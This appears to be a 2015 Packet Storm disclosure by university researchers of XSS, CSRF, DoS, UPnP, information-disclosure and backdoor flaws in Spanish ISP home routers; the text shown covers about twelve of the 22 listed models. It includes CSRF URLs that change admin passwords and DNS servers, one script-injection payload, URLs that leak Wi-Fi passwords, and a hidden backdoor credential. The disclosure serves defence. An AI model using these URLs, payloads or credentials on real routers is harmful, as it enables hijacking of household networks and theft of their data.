60+ Vulnerabilities In 22 SOHO Routers

2015-05-29T00:00:00
ID PACKETSTORM:132074
Type packetstorm
Reporter Ivan Sanz de Castro
Modified 2015-05-29T00:00:00

Description

                                        
                                            `Dear PacketStorm community,  
  
we are a group of security researchers doing our IT Security Master's Thesis at Universidad   
Europea de Madrid.  
  
As a part of the dissertation, we have discovered multiple vulnerability issues on the   
following SOHO routers:  
  
1. Observa Telecom AW4062  
2. Comtrend WAP-5813n  
3. Comtrend CT-5365  
4. D-Link DSL-2750B  
5. Belkin F5D7632-4  
6. Sagem LiveBox Pro 2 SP  
7. Amper Xavi 7968 and 7968+  
8. Sagem Fast 1201  
9. Linksys WRT54GL  
10. Observa Telecom RTA01N  
11. Observa Telecom Home Station BHS-RTA  
12. Observa Telecom VH4032N  
13. Huawei HG553  
14. Huawei HG556a  
15. Astoria ARV7510  
16. Amper ASL-26555  
17. Comtrend AR-5387un  
18. Netgear CG3100D  
19. Comtrend VG-8050  
20. Zyxel P 660HW-B1A  
21. Comtrend 536+  
22. D-Link DIR-600  
  
  
The aforementioned vulnerabilities are:   
- Persistent Cross Site Scripting (XSS) on #1, #2, #3, #6, #10, #12, #13, #14, #16, #17, #18, #19 and #20.  
- Unauthenticated Cross Site Scripting on #3, #7, #8, #9, #10, #14, #16, #17 and #19.  
- Cross Site Request Forgery (CSRF) on #1, #2, #3, #5, #10, #12, #13, #14, #15, #16, #18 and #20.  
- Denial of Service (DoS) on #1, #5 and #10.  
- Privilege Escalation on #1.  
- Information Disclosure on #4 and #11.  
- Backdoor on #10.  
- Bypass Authentication using SMB Symlinks on #12.  
- USB Device Bypass Authentication on #12, #13, #14 and #15.  
- Bypass Authentication on #13 and #14.  
- Universal Plug and Play related vulnerabilities on #2, #3, #4, #5, #6, #7, #10, #11, #12, #13, #14, #16, #21 and #22.  
  
  
CVEs have already been requested to MITRE and other CNAs (since MITRE is taking forever to   
assign a CVE) and we are waiting for response. OSVDB IDs have been assigned.  
  
Vendors and manufacturers have already been reported.  
  
All routers have been physically tested.  
  
  
============================================================================================  
Manufacturer: Observa Telecom   
Model: AW4062   
Tested firmwares: 1.3.5.18 and 1.4.2 (latest)  
Comments: Common router that Spanish ISP Telefónica used to give away to their  
ADSL customers specially during 2012.  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Multiple Cross-site Scriptings (XSS) found into the configuration   
menu within the router front-web.   
These XSS give an attacker the opportunity to execute malicious   
scripts.  
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.  
OSVDB-121211 (http://osvdb.org/show/osvdb/121211)  
  
* PoC:  
The threat is found inside some entry inputs that let special characters to be written in   
and show the added information into the web itself.  
  
I.e., there’s a vulnerable input field within the subdirectory Domain Blocking. When used   
legitimately, this input is used to block the traffic between the router and some particular  
domains.  
The script will remain stored (persistent XSS) into the field Domain from the Domain Block   
Table and it will be executed each time the victim access to the Domain Blocking   
subdirectory.  
  
This vulnerability can also be found within the input fields that belong to other   
subdirectories like Firewall/URL Blocking, Firewall/Port Forwarding, Services/DNS/Dynamic   
DNS and Advance/SNMP, between others.  
  
The most effective attack is found inside the Advance/SNMP subdirectory. By injecting the   
script into the System Name field, the malicious code will be executed each time someone   
connects to the router because the script is reflected into the home page.   
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Every input field is vulnerable to Cross Site Request Forgery   
(CSRF) attacks.  
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.  
OSVDB-121210 (http://osvdb.org/show/osvdb/121210),  
OSVDB-121212 (http://osvdb.org/show/osvdb/121212) and  
OSVDB-121214 (http://osvdb.org/show/osvdb/121214)  
  
* PoC:  
I.e., if an attacker wants the victim to ping a certain IP address in order to check whether   
the victim is already logged into the router, he will send this URL to the victim:   
http://192.168.1.1/goform/formPing?pingAddr=37.252.96.88  
  
It is also possible for an attacker to change the default router password by sending the   
victim this URL:  
http://192.168.1.1/goform/formPasswordSetup?userMode=0&oldpass=1234&newpass=12345&confpass=12345&save=%22Apply%20Changes%22  
The URL above forces the user with index 0 (it is always going to be the user named 1234)   
to change his default password from 1234 to 12345.  
  
The following URL forces the victim to change his DNS servers to those the attacker wants to.  
http://192.168.1.1/goform/formDNS?dnsMode=dnsManual&dns1=37.252.96.88&dns2=&dns3=  
  
Any action which is available within the website can be attacked through CSRF.   
This includes opening ports, changing the DHCP and NTP servers, modifying the Wireless   
Access point, enabling WPS, etc.  
--------------------------------------------------------------------------------------------  
  
---------------------------------- Privilege Escalation ----------------------------------  
* Description: Any user without administrator rights is able to carry out a   
privilege escalation by reading the public router configuration   
file (config.xml). This file stores each of the router configuration   
parameters, including the credentials from all users in plain text.  
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.  
OSVDB-121213 (http://osvdb.org/show/osvdb/121213) and  
OSVDB-121285 (http://osvdb.org/show/osvdb/121285)  
  
* PoC:  
An user without administrator rights (i.e., user), connects to the router through FTP.  
This user is able to get both /etc/passwd and config.xml files.  
The file config.xml stores each of the router configuration parameters in plain text,   
including the credentials from all users.  
Doing so, any user is able to gain administrator privileges.  
  
This is critical because not too many people know there is another user apart from the   
administrator one. That means they only change the administrator password, leaving a   
default user with default credentials (user:user) being able to escalate privileges.  
--------------------------------------------------------------------------------------------  
  
------------------------------------ Denial of Service -----------------------------------  
* Description: An attacker is able to carry out an external Denial of Service   
attack  
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.  
  
* PoC:  
It is possible for an attacker to carry out a Denial of Service attack through CSRF:   
http://192.168.1.1/goform/admin/formReboot  
If a victim opens this URL, router commits all the information and reboots in a process   
that takes 60 seconds long.  
  
There are tons of ways for an attacker to do a Denial of Service attack by exploiting   
Cross Site Request Forgery vulnerabilities:  
a) Establish new firewall rules in order to block certain URLs, IPs or MACs. Even setting   
up a global Deny order is possible and only allowing traffic from/to certain IPs/MAcs.  
b) Delete the router configuration that allows itself to connect to the Internet Service   
Provider.  
c) Disable the Wireless Interface so no device can be connected through the 802.11 protocol.  
d) Etc.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Comtrend  
Model: WAP-5813n (tested in Product Numbers 723306-104 and 723306-033)  
Tested firmwares: P401-402TLF-C02_R35 and P401-402TLF-C04_R09 (latest one)  
Comments: Common router that Spanish ISP Telefónica used to give away to   
their FTTH customers from 2011 to 2014  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.   
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.  
OSVDB-121218 (http://osvdb.org/show/osvdb/121218)  
  
* PoC:  
Despite the fact that most of the input fields do not allow special characters to be   
written in, there are still some of them in which a XSS can be performed.  
  
I.e., the SSID field within the Wireless>Basic subdirectory allows script code injection.  
The script execution can be clearly seen within the   
Wireless>Security and Wireless>MAC Filter subdirectories.  
  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out actions   
such as changing the administrator password.  
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.  
OSVDB-121216 (http://osvdb.org/show/osvdb/121216) and  
OSVDB-121217 (http://osvdb.org/show/osvdb/121217)  
  
* PoC:  
Every input field is vulnerable to CSRF.  
Whenever the administrator user changes his password, he is actually opening the URL:   
/password.cgi?adminPassword=newpassword.  
  
An attacker may send the following URL to the victim, so the administrator password will   
be changed to 1234567890:  
http://192.168.1.1/password.cgi?adminPassword=1234567890  
  
If an attacker wants to change the DNS servers, he may use the following URL to do so once   
the victim opens the link:   
http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.252.96.88&dnsSecondary=37.252.96.89&dnsIfc=&dnsRefresh=1  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.  
OSVDB-122383 (http://osvdb.org/show/osvdb/122383)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has   
lots of weaknesses, such as the lack of an authentication process, which can be exploited   
by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (router needs   
to be factory reset to work properly again) or open critical ports, even for remote hosts   
which are not into the LAN.   
============================================================================================  
  
  
============================================================================================  
Manufacturer: Comtrend  
Model: CT-5365  
Tested firmwares: A111-306TKF-C02_R16  
Comments: Common router that Spanish ISP Telefónica used to give away to   
their FTTH customers since 2012  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.   
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.  
OSVDB-121218 (http://osvdb.org/show/osvdb/121218)  
  
* PoC:  
Despite the fact that most of the input fields do not allow special characters to be   
written in, there are still some of them in which a XSS can be performed.  
  
I.e., the SSID field within the Wireless>Basic subdirectory allows script code injection.  
The script execution can be clearly seen within the   
Wireless>Security and Wireless>MAC Filter subdirectories.  
  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out actions   
such as changing the administrator password.  
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.  
OSVDB-121216 (http://osvdb.org/show/osvdb/121216) and  
OSVDB-121217 (http://osvdb.org/show/osvdb/121217)  
  
* PoC:  
Every input field is vulnerable to CSRF.  
Whenever the administrator user changes his password, he is actually opening the URL:   
/password.cgi?sysPassword=newpassword.  
An attacker may send the following URL to the victim, so the administrator password will be   
changed to 1234567890:  
http://192.168.1.1/password.cgi?sysPassword=1234567890  
  
If an attacker wants to change the DNS servers, he may use the following URL to do so once   
the victim opens the link:   
http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.56.61.35.88&dnsSecondary=80.58.61.34&dnsDinamic=0&dnsRefresh=1  
  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignation.   
OSVDB-121215 (http://osvdb.org/show/osvdb/121215)  
  
* PoC:  
  
An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code will be stored into the hostname field within the Connected Clients   
list (Device Info -> DHCP).   
Once the victim views this list, the script is executed.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.  
OSVDB-122383 (http://osvdb.org/show/osvdb/122383)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has   
lots of weaknesses, such as the lack of an authentication process, which can be exploited   
by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (router needs   
to be factory reset to work properly again) or open critical ports, even for remote hosts   
which are not into the LAN.   
============================================================================================  
  
  
============================================================================================  
Manufacturer: D-Link  
Model: DSL-2750B  
Tested firmwares: EU_1.01  
Comments:   
--------------------------------------------------------------------------------------------  
  
------------------ Information Disclosure (Insecure Object References) -------------------   
* Description: An attacker is able to obtain critical information without being   
logged in.  
* Report status: Reported to MITRE on 2015-03-25. Waiting for assignation.  
OSVDB-121219 (http://osvdb.org/show/osvdb/121219)  
  
* PoC:  
By accessing the URL http://192.168.1.1/hidden_info.html, browser shows huge amount of   
parameters such as SSID, Wi-Fi password, PIN code, etc. without requiring any login process.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.  
OSVDB-122384 (http://osvdb.org/show/osvdb/122384)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This   
protocol has lots of weaknesses, such as the lack of an authentication process, which can   
be exploited by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (router needs   
to be factory reset to work properly again) or open critical ports, even for remote hosts   
which are not into the LAN.   
============================================================================================  
  
  
============================================================================================  
Manufacturer: Belkin  
Model: F5D7632-4  
Tested firmwares: 6.01.04  
Comments:   
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out   
malicious actions.   
* Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15.   
Waiting for assignation.  
OSVDB-121220 (http://osvdb.org/show/osvdb/121220)  
  
* PoC:  
Every input field is vulnerable to CSRF.  
I.e., if an attacker wants to change the DNS servers, he may use the following URL to do so:   
http://192.168.2.1/cgi-bin/setup_dns.exe?page="setup_dns"&logout=""&dns1_1=37&dns1_2=252  
&dns1_3=96&dns1_4=88&dns2_1=37&dns2_2=252&dns2_3=96&dns2_4=89  
  
--------------------------------------------------------------------------------------------  
  
------------------------------------ Denial of Service -----------------------------------  
* Description: An attacker is able to carry out an external Denial of Service   
attack.  
* Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15.   
Waiting for assignation.  
  
* PoC:  
It is possible for an attacker to carry out a Denial of Service attack through CSRF:  
http://192.168.2.1/cgi-bin/restart.exe?page="tools_gateway"&logout=""  
This URL causes the router to reboot, interrupting any active connection and denying the   
service for about 20 seconds.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.  
OSVDB-122389 (http://osvdb.org/show/osvdb/122389)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has   
lots of weaknesses, such as the lack of an authentication process, which can be exploited   
by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (router needs   
to be factory reset to work properly again) or open critical ports, even for remote hosts   
which are not into the LAN.   
============================================================================================  
  
  
============================================================================================  
Manufacturer: Sagem  
Model: LiveBox 2 Pro  
Tested firmwares: FAST3yyy_671288  
Comments: Common router that ISP Orange used to give away to their ADSL   
customers.  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code, even if the victim is not logged into the router   
web-config page.   
* Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15.   
Waiting for assignation.  
OSVDB-121223 (http://osvdb.org/show/osvdb/121223)   
  
* PoC:  
Despite the fact that most of the input fields do not allow special characters to be   
written in, there are still some of them in which a XSS can be performed.  
  
1. The SSID field within the “Configuración-> Equipos -> Personalizar”   
(Configuration->Devices->Personalize) subdirectory allows script code injection.  
The script execution can be clearly seen within the “Configuración-> Equipos -> Mostrar”  
(Configuration->Devices->Show) subdirectory.  
  
2. The SSID field within the “Configuración-> LiveBox-> Configuracion Wifi -> SSID-name”   
(Configuration->LiveBox->Wi-Fi Configuration->SSID-Name) subdirectory allows script   
code injection.  
The script execution can be clearly seen within the main log-in webpage, even if the   
user is not logged in.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.  
OSVDB-122387 (http://osvdb.org/show/osvdb/122387)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This   
protocol has lots of weaknesses, such as the lack of an authentication process, which can   
be exploited by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (router needs   
to be factory reset to work properly again) or open critical ports, even for remote hosts   
which are not into the LAN.   
============================================================================================  
  
  
============================================================================================  
Manufacturer: Amper  
Model: Xavi 7968 and Xavi 7968+  
Tested firmwares: 3.01APT94 (latest one)  
Comments: Common router that ISP Telefónica used to give away to their ADSL   
customers from 2010 to 2013.  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignation.  
OSVDB-121224 (http://osvdb.org/show/osvdb/121224)   
  
* PoC:  
An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code will be stored into the hostname field within the Connected Clients   
list (/webconfig/status/dhcp_table.html).   
Once the victim views this list, the script is executed.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify the WPS configuration   
by using the supported Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.  
OSVDB-122388 (http://osvdb.org/show/osvdb/122388)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This   
protocol has lots of weaknesses, such as the lack of an authentication process, which can   
be exploited by attackers.  
  
The device supports multiple UPnP actions, such as changing the WPS configuration or   
resetting the AP to default settings.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Sagem  
Model: Fast 1201  
Tested firmwares: 3.01APT94 (latest one)  
Comments: -  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignation.  
OSVDB-121222 (http://osvdb.org/show/osvdb/121222)   
  
* PoC:  
An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code will be stored into the hostname field within the DHCP Leases   
list (dhcpinfo.html).   
Once the victim views this list, the script is executed.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Linksys  
Model: WRT54GL  
Tested firmwares: 4.30.16 build 6  
Comments: -  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignation.  
OSVDB-121221 (http://osvdb.org/show/osvdb/121221)  
  
* PoC:  
  
An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code will be stored into the hostname field within the Connected Clients   
list (DHCPTable.asp). It can be accessed either directly through the URL or through the   
Status-> Local Network -> DHCP Clients Table subdirectories.   
Once the victim views this list, the script is executed.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Observa Telecom  
Model: RTA01N  
Tested firmwares: RTK_V2.2.13  
Comments: Common router that Spanish ISP Telefónica used to give away to their   
ADSL/VDSL customers  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Multiple Cross-site Scriptings (XSS) found into the configuration   
menu within the router front-web. These XSS give an attacker the   
opportunity to execute malicious scripts.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121787 (http://osvdb.org/show/osvdb/121787) and  
OSVDB-121788 (http://osvdb.org/show/osvdb/121788)  
  
* PoC:  
The threat is found inside some entry inputs that let special characters to be written in   
and show the added information into the web itself.  
  
I.e., Nombre del host (Hostname) input field within the subdirectory Servicio -> DDNS   
(Service -> DDNS or /ddns.htm) is vulnerable.   
There is another vulnerable input field within the Mantenimiento -> Contraseña   
(Maintenance -> Password or /userconfig.htm) subdirectory.  
After creating a user whose username contains the malicious script, it is stored into the   
User Accounts table and executes once the victim accesses this subdirectory.  
  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Every input field is vulnerable to Cross Site Request Forgery   
(CSRF) attacks.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121786 (http://osvdb.org/show/osvdb/121786)  
  
* PoC:  
I.e., if an attacker wants to change the DNS servers, he may use the following URL to do so   
once the victim opens the link:   
http://192.168.1.1/form2Dns.cgi?dnsMode="1"&dns1="37.252.96.88"&dns2="37.252.96.89"&dns3=""&submit.htm?dns.htm="Send"&save="Aplicar cambios"  
  
It is also possible for an attacker to change the default router administrator password by   
sending the victim this URL:   
http://192.168.1.1/form2userconfig.cgi?username="1234"&privilege=2&oldpass="1234"&newpass="newpass"&confpass="newpass"&modify="Modificar"&select="s0"&hiddenpass="1234"&submit.htm?userconfig.htm="Send"  
The URL above forces the administrator user (it is always going to be the user named 1234)   
to change his default password from 1234 to newpass.  
  
--------------------------------------------------------------------------------------------  
  
------------------------------------ Denial of Service -----------------------------------  
* Description: An attacker is able to carry out an external Denial of Service   
attack  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
  
* PoC:  
It is possible for an attacker to carry out a Denial of Service attack through CSRF:   
http://192.168.1.1/form2Reboot.cgi?rebootMode=0&reboot="Reiniciar"&submit.htm?reboot.htm="Send"  
  
If a victim opens this URL, router replies with HTTP 200 OK status code and reboots.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121789 (http://osvdb.org/show/osvdb/121789)  
  
* PoC:  
An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code will be stored within the DHCP Active Clients table (/dhcptbl.html).  
Once the victim views this list, the script is executed.  
  
--------------------------------------------------------------------------------------------  
  
----------------------------------------- Backdoor ---------------------------------------  
* Description: There is a second default administrator user who is hidden to the   
legitimate router owner.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121785 (http://osvdb.org/show/osvdb/121785)  
  
* PoC:  
In addition to the well-known 1234 administrator user, there is another one named admin,   
whose password is 7449airocon.  
  
This superuser remains hidden (it does only appear into the backup configuration XML file)   
and is able to modify any configuration settings either through the web interface or   
through telnet.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules,   
carry out a persistent denial of service and obtain the WLAN   
passwords, between other things, by using the supported Universal   
Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.  
OSVDB-122386 (http://osvdb.org/show/osvdb/122386)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has   
lots of weaknesses, such as the lack of an authentication process, which can be exploited   
by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (router needs   
to be factory reset to work properly again) or open critical ports, even for remote hosts   
which are not into the LAN.   
  
It is also possible for an attacker to change the WPS configuration settings, reset the AP   
to the default ones and obtain critical information, such as WLAN passwords.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Observa Telecom  
Model: Home Station BHS-RTA  
Tested firmwares: v1.1.3  
Comments: Common router that Spanish ISP Telefónica used to give away to their   
ADSL/VDSL customers  
--------------------------------------------------------------------------------------------  
  
--------------------------------- Information Disclosure ---------------------------------  
* Description: Observa Telecom Home Station BHS-RTA web interface allows an   
external attacker to obtain critical information without login   
process.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121781 (http://osvdb.org/show/osvdb/121781),  
OSVDB-121782 (http://osvdb.org/show/osvdb/121782),  
OSVDB-121783 (http://osvdb.org/show/osvdb/121783) and  
OSVDB-121784 (http://osvdb.org/show/osvdb/121784)  
  
* PoC:  
Without requiring any login process, an external attacker is able to obtain critical   
information such as the WLAN password and settings, the Internet configuration, a list of   
connected clients, etc.  
  
By accessing the following URL, browser shows WLAN configuration, including the passwords:  
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnWifiJSON.txt&var:page=returnWifiJSON.txt&_=1430086147101  
  
By accessing the following URL, browser shows a list of connected clients, including their   
IP and MAC addresses:   
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnDevicesJSON.txt&var:page=returnDevicesJSON.txt&_=1430086147101  
  
By accessing the following URL, browser shows the Internet configuration parameters:  
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnInternetJSON.txt&var:page=returnInternetJSON.txt&_=1430086980134  
  
By accessing the following URL, browser shows whether the administrator password has been   
changed or is the default one.  
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnPasswordJSON.txt&var:page=returnPasswordJSON.txt&_=1430086980134  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.  
OSVDB-122386 (http://osvdb.org/show/osvdb/122386)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has   
lots of weaknesses, such as the lack of an authentication process, which can be exploited   
by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (router needs   
to be factory reset to work properly again) or open critical ports, even for remote hosts   
which are not into the LAN.   
============================================================================================  
  
  
============================================================================================  
Manufacturer: Observa Telecom  
Model: VH4032N  
Tested firmwares: VH4032N_V0.2.35  
Comments: Common router that ISP Vodafone used to give away to their customers  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121793 (http://osvdb.org/show/osvdb/121793)  
  
* PoC:  
The threat is found inside some entry inputs that let special characters to be written in   
and show the added information into the web itself.  
  
I.e, the SSID input field is vulnerable if the following code is written in:  
‘; </script><script>alert(1)</script><script>//  
The malicious code will be executed throughout the whole web interface.  
  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Every input field is vulnerable to Cross Site Request Forgery   
(CSRF) attacks.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121791 (http://osvdb.org/show/osvdb/121791) and  
OSVDB-121792 (http://osvdb.org/show/osvdb/121792)  
  
* PoC:  
Although the existence of a token related to session ID, configuration settings can be   
modified without the need of it. Thus, every input field is vulnerable to CSRF attacks.  
  
I.e., if an attacker wants to change the administrator password, he may use the following   
URL to do so once the victim opens the link:   
http://192.168.0.1/en_US/administration.cgi?usrPassword=newpass  
  
If an attacker wants to change the FTP server configuration settings, such as the password   
and the allowance of remote FTP WAN connections, he may use the following link:  
http://192.168.0.1/en_US/config_ftp.cgi?ftpEnabled=1&ftpUserName=vodafone&ftpPassword=vulnpass&ftpPort=21&ftpAclMode=2  
  
--------------------------------------------------------------------------------------------  
  
------------------------ Bypass Authentication using SMB Symlinks ------------------------  
* Description: An external attacker, without requiring any login process, is able   
to download the whole router kernel filesystem, including all the   
configuration information and the user account information files,   
by creating symbolic links through the router Samba server.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121790 (http://osvdb.org/show/osvdb/121790)  
  
* PoC:  
An unauthenticated attacker is able to download the whole router filesystem by connecting   
to the Samba server.   
  
There is a shared service (called storage) in which it is possible to create symbolic links   
to the router filesystem and download the content. I.e., a symlink to / is possible and   
allows the attacker to freely view and download the entire filesystem.  
  
--------------------------------------------------------------------------------------------  
  
---------------------------- USB Device Bypass Authentication ----------------------------  
* Description: An external attacker, without requiring any login process, is able   
to view, modify, delete and upload new files to the USB storage   
device connected to the router.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121794 (http://osvdb.org/show/osvdb/121794)  
  
* PoC:  
If a USB storage device is hooked up to the router, an external attacker is able to   
download, modify the content and upload new files, without requiring any login process.  
  
